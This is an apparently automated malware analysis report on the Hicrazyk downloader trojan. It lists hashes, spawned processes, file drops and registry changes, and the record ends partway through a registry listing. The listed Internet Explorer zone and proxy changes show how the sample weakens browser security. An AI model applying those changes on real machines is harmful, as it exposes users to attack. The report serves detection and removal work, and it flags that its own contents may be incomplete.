Trojan.Downloader.Hicrazyk.A_9b1f598aec

by malwarelabrobot on May 22nd, 2014 in Malware Descriptions.

Trojan.NSIS.StartPage.eg (Kaspersky), Trojan.Downloader.Hicrazyk.A (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 9b1f598aec7a30c57e3b470e6aaf77cb
SHA1: 5a4b41f40e56d79071961d7e5b32993c61b1e820
SHA256: 3ef1fd2ccd2c8cfaf0751e6fda774a745ebe40dbe23e5c981623e0723f125359
SSDeep: 24576:kwSn/ryOTUU6b34jcK3yXahZe txE6ZrCcQFLPlVBzXh9Br/A:pS/f6Uj2a3HEOOcQFLBbzdI
Size: 1355038 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AllaboutApp
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

worldweather.exe:2288
worldWeatherUpdate.5002.exe:3076
365weatherIns_61.exe:456
greendou.exe:2332
PM10.5002.exe:2384
worldWeatherRealTime5002.exe:1344
mscorsvw.exe:424

The Trojan injects its code into the following process(es):

%original file name%.exe:1956

File activity

The process worldweather.exe:2288 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (288 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Program Files%\worldweather\5.0.0.5002\weatherData.tmp (354 bytes)
%Documents and Settings%\%current user%\Cookies\WXPOEL80.txt (73 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\go[1].htm (0 bytes)

The process worldWeatherUpdate.5002.exe:3076 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\PM10Context[1].xml (835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\AQIContext[1].xml (365 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\AQIContext\AQIContext.db.!mv (365 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\PM25Context[1].xml (624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\WeatherContext[1].xml (509 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (1196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\366[1].ico (16369 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\367.ico.!mv (1177 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM25Context\PM25Context.db.!mv (624 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\366.ico.!mv (16369 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\PM10Context\PM10Context.db.!mv (835 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\369[1].ico (16369 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db.!mv (509 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\369.ico.!mv (16369 bytes)
%Documents and Settings%\%current user%\Cookies\JB38A659.txt (102 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\367[1].ico (1177 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db (0 bytes)

The process 365weatherIns_61.exe:456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\worldweather\5.0.0.5002\skins\default\btn_min.jpg (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\1.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\PM10.5002.exe (7192 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\loading.gif (8 bytes)
%Program Files%\worldweather\5.0.0.5002\weather.db (6584 bytes)
%Program Files%\worldweather\5.0.0.5002\uninst.exe (2251 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\un_update.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_next.bmp (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\bg.bmp (18424 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_move.jpg (1 bytes)
%Program Files%\worldweather\5.0.0.5002\areacode.db (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\2.jpg (1552 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\update.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\checkbox2.bmp (2 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\n99.png (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\checkbox1.bmp (2 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\future\tips.ico (1856 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_setting.jpg (3 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db (352 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\i.gif (170 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\err.png (784 bytes)
%Program Files%\worldweather\5.0.0.5002\updateContext\updateRecord.db (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\loading1.bmp (696 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\min.png (440 bytes)
%Program Files%\worldweather\5.0.0.5002\sqliteApi.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsu4.tmp (80589 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\inetc.dll (784 bytes)
%Program Files%\worldweather\5.0.0.5002\sqlite3.dll (20416 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (325 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_complete.bmp (2392 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_max.jpg (3 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe (4992 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_small.png (4 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (325 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\tongji.html (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\nsWindows.dll (10 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\´óÖÚÌìÆøÔ¤±¨Ð¶ÔØ.lnk (911 bytes)
%Program Files%\worldweather\5.0.0.5002\worldweather.exe (19096 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\loading.png (3 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\worldweather\´óÖÚÌìÆøÔ¤±¨.lnk (943 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\large\n99.png (784 bytes)
%Program Files%\worldweather\5.0.0.5002\AQI.5002.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_close.bmp (1 bytes)
%Program Files%\worldweather\5.0.0.5002\WeatherContext\WeatherContext.db (352 bytes)
%Program Files%\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\tongji_61[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\ToggleImages.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\System.dll (11 bytes)
%Program Files%\worldweather\5.0.0.5002\PM25.5002.exe (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\3.jpg (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\nsDialogs.dll (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\md5dll.dll (8 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\bg_large.png (9 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\kz.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\close.png (873 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\skin.xml (6 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\default\btn_close.jpg (3 bytes)
%Program Files%\worldweather\5.0.0.5002\skins\common\topbar.png (3 bytes)
%Program Files%\worldweather\5.0.0.5002\mfc5002.dll (5520 bytes)
%Documents and Settings%\All Users\Application Data\worldweather\updateContext\updateRecord.db (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\loading2.bmp (696 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\All Users\Application Data\worldweather\updateContext\VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf3.tmp (0 bytes)

The process greendou.exe:2332 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1] (10094 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1].txt (14600 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (1134 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041520130416\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013040820130415\index.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013040820130415 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012013041520130416 (0 bytes)

The process PM10.5002.exe:2384 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Application Data\worldweather\Cfg5002.ini (24 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Ëѹ·¸ßËÙÉÏÍø.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\367.ico (9 bytes)
%Program Files%\worldweather\5.0.0.5002\Cfg5002.ini (24 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\~DFFF22.tmp (0 bytes)

The process mscorsvw.exe:424 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (848 bytes)

The process %original file name%.exe:1956 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\greeou\skin\Default\control\tab_hover.png (346 bytes)
%Program Files%\greeou\skin\Default\control\tab_bg.png (314 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\open.ini (3 bytes)
%Program Files%\greeou\skin\Default\misc\16_ad_hunter.png (716 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\365weatherIns_61.exe (114375 bytes)
%Program Files%\greeou\profile\Template\start\style.css (3 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back3.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites2.png (696 bytes)
%Program Files%\greeou\skin\Default\control\MenuItem_Hover.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Program Files%\greeou\skin\Default\misc\24_go.png (650 bytes)
%Program Files%\greeou\skin\Default\shared\16_new.png (650 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_favorites.png (700 bytes)
%Program Files%\greeou\profile\Defaults\CommandBars.ini (1 bytes)
%Program Files%\greeou\skin\Default\mskin.ini (10 bytes)
%Program Files%\greeou\GreenDou.exe (25123 bytes)
%Program Files%\greeou\skin\Default\control\status_bar_bg.png (445 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown_hover.png (774 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward.png (947 bytes)
%Program Files%\greeou\skin\Default\control\win_minimize.png (202 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh.png (1 bytes)
%Program Files%\greeou\skin\Default\control\combo_dropdown.png (794 bytes)
%Program Files%\greeou\profile\Template\start\images\logo.gif (3 bytes)
%Program Files%\greeou\skin\Default\control\Button_Pressed.png (1 bytes)
%Program Files%\greeou\profile\Template\start\index.html (832 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_website_info.png (1 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new.png (879 bytes)
%Program Files%\greeou\skin\Default\control\title_bg.png (655 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_home2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_logo.gif (2 bytes)
%Program Files%\greeou\skin\Default\shared\16_edit.png (646 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar.png (321 bytes)
%Program Files%\greeou\profile\SearchEngine\config.ini (226 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new2.png (801 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom2.png (724 bytes)
%Program Files%\greeou\profile\Template\start\images\dian.gif (376 bytes)
%Program Files%\greeou\skin\Default\control\win_close.png (362 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_refresh2.png (1 bytes)
%Program Files%\greeou\profile\Template\start\images\header_bg.gif (83 bytes)
%Program Files%\greeou\skin\Default\control\tab_active.png (1 bytes)
%Program Files%\greeou\skin\Default\control\mainframe.png (288 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back2.png (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_inactive.png (281 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_inactive.png (259 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_open.png (614 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search.png (871 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown.png (794 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop2.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (3004 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\xID.dll (3 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_search2.png (969 bytes)
%Program Files%\greeou\skin\Default\control\win_maximum.png (275 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_new.png (637 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_page_zoom.png (733 bytes)
%Program Files%\greeou\skin\Default\control\tab_sidebar_hover.png (322 bytes)
%Program Files%\greeou\skin\Default\control\Button_Hover.png (1 bytes)
%Program Files%\greeou\skin\Default\control\progress.png (708 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_back.png (953 bytes)
%Program Files%\greeou\skin\Default\control\combo.png (260 bytes)
%Program Files%\greeou\profile\SearchEngine\google.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\tab_new.png (350 bytes)
%Program Files%\greeou\skin\Default\control\combosearch_dropdown_hover.png (774 bytes)
%Program Files%\greeou\profile\Template\start\left.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setup_3128.exe (125242 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\nsRandom.dll (935 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward2.png (1 bytes)
%Program Files%\greeou\profile\Defaults\config.ini (902 bytes)
%Program Files%\greeou\skin\Default\control\skin_selector.png (283 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\Md5dll.dll (8 bytes)
%Program Files%\greeou\skin\Default\control\win_restore.png (302 bytes)
%Program Files%\greeou\skin\Default\control\Button_Checked.png (976 bytes)
%Program Files%\greeou\skin\Default\misc\16_page.png (519 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\processwork.dll (6140 bytes)
%Program Files%\greeou\skin\Default\control\tab_close.png (259 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history2.png (994 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo2.png (840 bytes)
%Program Files%\greeou\skin\Default\control\tab_new_hover.png (346 bytes)
%Program Files%\greeou\profile\SearchEngine\taobao.ico (1 bytes)
%Program Files%\greeou\skin\Default\control\sidebar_tab_active.png (957 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_new2.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_folder_closed.png (587 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_stop.png (1 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_bg.png (507 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Â̶¹ä¯ÀÀÆ÷\Â̶¹ä¯ÀÀÆ÷.lnk (678 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\Inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Desktop\Â̶¹ä¯ÀÀÆ÷.lnk (666 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_history.png (847 bytes)
%Program Files%\greeou\skin\Default\toolbar\16_undo.png (748 bytes)
%Program Files%\greeou\profile\SearchEngine\baidu.ico (2 bytes)
%Program Files%\greeou\skin\Default\misc\24_go2.png (648 bytes)
%Program Files%\greeou\profile\Defaults\last.ini (348 bytes)
%Program Files%\greeou\skin\Default\control\combo_hover.png (261 bytes)
%Program Files%\greeou\skin\Default\control\tab_close_hover.png (2 bytes)
%Program Files%\greeou\profile\Defaults\searchkeys.ini (14 bytes)
%Program Files%\greeou\skin\Default\toolbar\24_forward3.png (1 bytes)
%Program Files%\greeou\ico\taobao.ico (2104 bytes)
%Program Files%\greeou\skin\Default\misc\16_open_in_new.png (548 bytes)
%Program Files%\greeou\profile\Template\start\images\logo2.gif (596 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\open.ini (0 bytes)

Registry activity

The process worldweather.exe:2288 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DC 3E 7C 02 F5 A0 AB 08 14 76 BD 80 D7 AA F8 7E"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather\5.0.0.5002]
"worldWeatherUpdate.5002.exe" = "天气预报升级核心"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 45 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process worldWeatherUpdate.5002.exe:3076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F0 12 58 84 14 40 69 99 83 76 A6 88 17 F9 C2 8F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{773a730e-74fb-11e2-b597-000c293bdf2f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\worldweather\5.0.0.5002]
"PM10.5002.exe" = "PM10.5002"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f5-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 47 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 365weatherIns_61.exe:456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f3-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"UninstallString" = "%Program Files%\worldweather\5.0.0.5002\uninst.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"index" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"jieguo" = "mac=00-0C-29-3B-DF-2F&soft_id=33&tuiguang_id=C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\365weatherIns_61.exe&yanzheng=f72e066ddb1d94ae63e1d32390e05757"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\worldweather]
"DisplayIcon" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
"mac" = "00-0C-29-3B-DF-2F"

"(Default)" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{fdd9f6f2-7454-11e2-b4cd-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\worldweather.exe]
